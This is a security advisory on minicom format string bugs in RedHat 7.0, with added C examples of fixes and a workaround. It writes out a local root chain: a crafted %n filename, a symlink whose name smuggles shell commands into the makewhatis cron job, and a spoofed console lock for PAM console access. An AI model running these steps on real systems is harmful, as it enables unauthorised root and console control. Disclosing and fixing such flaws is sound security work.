COMMAND
minicom
SYSTEMS AFFECTED
RedHat 7.0
PROBLEM
Zenith Parsec found the following. Minicom has multiple format string
bugs:
- ulog()
- werror()
Any user who has access to a correctly configured, setgid uucp
minicom can potentially gain root access within 24 hrs, or have
console access (as determined by PAM) and be able to cause
shutdown of the machine immediately.
This affects Redhat 7.0 and, judging by the dates in source code
comments, almost definitely earlier versions as well. This may not be
a security hole on other distributions; it depends on whether the
binary is installed setuid/setgid. A root exploit does exist.
If minicom -s hasn't been run as root beforehand, this exploit will
probably not work.
[root@clarity src]# whatis minicom
minicom (1) - friendly serial communication program
[root@clarity /root]# rpm -qf `which minicom`
minicom-1.83.1-4
[root@clarity src]# ll `which minicom`
-rwxr-sr-x 1 root uucp 171452 Jan 30 05:54 /usr/bin/minicom*
[root@clarity src]# cd /usr/src/redhat/SOURCES/minicom-1.83.1/src
[root@clarity src]# grep do_log common.c|grep -v "%"
common.c: * void do_log(char *) - write a line to the logfile
common.c: * 27.10.98 jl converted do_log to use stdarg
common.c:void do_log(char *line, ...)
common.c:void do_log(char *line, ...)
[root@clarity src]# grep do_log updown.c
do_log(cmdline); /* jl 22.06.97 */
do_log (trimbuf);
do_log(trimbuf);
do_log (trimbuf);
should be:
do_log("%s",cmdline); /* jl 22.06.97 */
do_log ("%s",trimbuf);
do_log("%s",trimbuf);
do_log ("%s",trimbuf);
Others are spread through the code that ZP hasn't checked, but they
should probably be fixed as well.
updown.c contains the code for the uploading and downloading of
files. cmdline contains the command that it executes to upload
and download files. Part of the command is of course the filename.
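As an added example (not minicom's code), here is a do_log() in the style the advisory describes, next to the hardened calling pattern from the "should be" lines: anything attacker-influenced (a filename, a command line) is passed as an argument to a constant "%s" format, so "%n" or "%x" in it is logged literally and never interpreted as a conversion. The log target, the function names and the sample strings are constructed for the example; the logfile is replaced by a buffer so the result can be inspected. The printf format attribute is a gcc/clang extension: with it in place, a call of the original form do_log(cmdline) is flagged by -Wformat-security at compile time.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for minicom's logfile: the formatted line
 * lands here so the caller can check what was written. */
static char logbuf[256];

/* format(printf, 1, 2): argument 1 is the format, varargs start at 2.
 * gcc -Wformat-security then warns on any call whose format is not a
 * string literal, which is exactly the do_log(cmdline) defect. */
static void do_log(const char *fmt, ...) __attribute__((format(printf, 1, 2)));

static void do_log(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(logbuf, sizeof logbuf, fmt, ap);   /* bounded, unlike sprintf */
    va_end(ap);
}

/* Hardened pattern: untrusted text is data, the format is constant.
 * Returns the logged line so it can be compared with the input. */
const char *log_user_string(const char *s)
{
    do_log("%s", s);
    return logbuf;
}

/* A legitimate use of the format with fields: the untrusted pieces
 * are still only ever arguments to a literal format string. */
const char *log_transfer(const char *proto, const char *file)
{
    do_log("%s transfer of %s", proto, file);
    return logbuf;
}

int main(void)
{
    /* Constructed sample mirroring the advisory's crash string. The %n
     * survives as two ordinary characters instead of writing to memory. */
    puts(log_user_string("/usr/bin/sx -vv %n"));
    puts(log_transfer("xmodem", "/root/%n"));
    return 0;
}
```

Compiling the original updown.c with the attribute added to do_log() and -Wformat-security (or -Wformat=2) enabled turns each of the four bare do_log(trimbuf)/do_log(cmdline) calls into a warning, which is a quick way to find the "others spread through the code" that the advisory mentions but did not enumerate.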
[root@clarity src]# touch ~/%n
[root@clarity src]# ll ~/%n
-rw-r--r-- 1 root root 0 Apr 11 11:26 /root/%n
Using root to demonstrate the problem so we can gdb the sgid program.
[root@clarity src]# gdb minicom
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) r
Starting program: /usr/bin/minicom
minicom: WARNING: please don't run minicom as root when not maintaining
it (with the -s switch) since all changes to the
configuration will be GLOBAL !.
Screen clears... initializing modem message...
Welcome to minicom 1.83.1
OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
Compiled on Aug 24 2000, 10:09:47.
Press CTRL-A Z for help on special keys
Press ^A S, select xmodem, then move the cursor down to %n, press
space to tag it and then press return...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x400b7a17 in _IO_vfprintf (s=0x8080a60,
format=0xbffff2c0 "/usr/bin/sx -vv %n", ap=0xbffff248)
at ../sysdeps/i386/i486/bits/string.h:539
539 ../sysdeps/i386/i486/bits/string.h: No such file or directory.
(gdb) q
Ok, big deal. You get gid uucp if you exploit it.
[root@clarity src]# cd /var/lock
[root@clarity lock]# ls -Flatrck
total 20
drwxr-xr-x 19 root root 4096 Apr 5 02:35 ../
drwxrwxr-x 2 root root 4096 Apr 7 12:10 subsys/
drwxr-xr-x 2 root root 4096 Apr 9 13:16 console/
drwxrwxr-x 4 root uucp 4096 Apr 11 11:31 ./
writable by gid uucp.. ok
[root@clarity lock]# cat /etc/cron.daily/makewhatis.cron
#!/bin/bash
LOCKFILE=/var/lock/makewhatis.lock
# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes. The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "rm -f $LOCKFILE" EXIT
touch $LOCKFILE
makewhatis -u -w
exit 0
The worst that can happen is someone will exploit this lockfile
mechanism for root.
[root@clarity lock]# su uucp
or run an exploit against minicom.. the gid is the important part.
sh-2.04$ id
uid=10(uucp) gid=14(uucp) groups=14(uucp)
sh-2.04$ ln -s "/usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz" /var/lock/makewhatis.lock
sh-2.04$ ls -al
total 16
drwxrwxr-x 4 root uucp 4096 Apr 11 11:41 .
drwxr-xr-x 19 root root 4096 Apr 5 02:35 ..
drwxr-xr-x 2 root root 4096 Apr 9 13:16 console
lrwxrwxrwx 1 uucp uucp 91 Apr 11 11:41 makewhatis.lock -> /usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz
drwxrwxr-x 2 root root 4096 Apr 7 12:10 subsys
OK... what is happening? Check out /usr/sbin/makewhatis.
pipe_cmd = "zcat " filename;
If the filename contains shell commands, they will be executed. This
is not normally a problem, as what manpages have embedded shell
commands? Malicious ones, like this. The echo on the end is there to
prevent the command from returning an error. The export PATH=. is
because we can't put any / characters in the filename.
Well, that will get you root the next time
/etc/cron.daily/makewhatis.cron runs. What else...
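The cron wrapper and makewhatis above fail in two separate places: the lock is a plain file in a directory that gid uucp can write, tested with -f (which follows symlinks), and the file name is spliced into a shell command string. As an added example, not Red Hat's code, here is the hardened form of both patterns in C: the lock is taken with mkdir(2), which is atomic and fails with EEXIST for anything already at the path, a planted symlink included, so the link is never followed; and the file name is handed to execvp() as a single argv element after "--", so ';' and friends are just bytes in a name. All paths, names and the "cat" stand-in for zcat are constructed for the example.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Take a lock by creating a directory. mkdir(2) is atomic and returns
 * EEXIST if anything already sits at the path, a dangling symlink too,
 * so unlike "[ -f $LOCKFILE ]" nothing is dereferenced. 0 = taken,
 * -1 = held or suspicious. */
int take_lock(const char *path)
{
    if (mkdir(path, 0700) == 0)
        return 0;
    if (errno == EEXIST)
        fprintf(stderr, "lock %s already exists (symlinks land here too)\n", path);
    return -1;
}

void release_lock(const char *path)
{
    rmdir(path);
}

/* Run prog with file as one argument and capture its stdout into out.
 * The advisory's makewhatis did the equivalent of system("zcat " name);
 * passing an argv vector to execvp() means shell metacharacters in the
 * name are never parsed by a shell. Returns the child's exit status,
 * or -1 on error. */
int run_with_file(const char *prog, const char *file, char *out, size_t outlen)
{
    int fds[2];
    if (pipe(fds) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]);
        close(fds[1]);
        /* "--" ends option parsing so a name beginning with '-' is not a flag. */
        char *const argv[] = { (char *)prog, "--", (char *)file, NULL };
        execvp(prog, argv);
        _exit(127);                           /* exec failed */
    }
    close(fds[1]);
    size_t got = 0;
    ssize_t n;
    while (got < outlen - 1 && (n = read(fds[0], out + got, outlen - 1 - got)) > 0)
        got += (size_t)n;
    out[got] = '\0';
    char sink[256];
    while (read(fds[0], sink, sizeof sink) > 0)
        ;                                     /* drain so the child can exit */
    close(fds[0]);
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed paths; a real lock directory must be writable by root only. */
    char dir[64], name[128], out[128];
    snprintf(dir, sizeof dir, "/tmp/mw-lock-%ld", (long)getpid());
    printf("first take_lock: %d (0 = taken)\n", take_lock(dir));
    printf("second take_lock: %d (-1 = already held)\n", take_lock(dir));
    /* A name carrying the same kind of metacharacters as the advisory's
     * symlink; with execvp it is only a name, so cat prints the file. */
    snprintf(name, sizeof name, "%s/ls.1.gz;echo INJECTED", dir);
    FILE *f = fopen(name, "w");
    if (f) { fputs("man page body\n", f); fclose(f); }
    int rc = run_with_file("cat", name, out, sizeof out);
    printf("cat exit %d, output: %s", rc, out);
    unlink(name);
    release_lock(dir);
    return 0;
}
```

The other half of the fix is outside the program: a lock path under a directory that gid uucp can write (the drwxrwxr-x root uucp /var/lock shown above) is what let the symlink be planted at all, so even an atomic lock should live where only root can write.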
sh-2.04$ rm makewhatis.lock
sh-2.04$ echo -n uucp>console.lock
sh-2.04$ mv console oldconsole
sh-2.04$ mkdir console;touch console/uucp
Now we are at the console (according to PAM, anyway). Halt, anyone?
SOLUTION
Work around: chmod -s /usr/bin/minicom
For Immunix OS:
http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/minicom-1.83.1-1.0.6x_StackGuard.i386.rpm
http://download.immunix.org/ImmunixOS/6.2/updates/SRPMS/minicom-1.83.1-1.0.6x_StackGuard.src.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/minicom-1.83.1-8_imnx.i386.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/SRPMS/minicom-1.83.1-8_imnx.src.rpm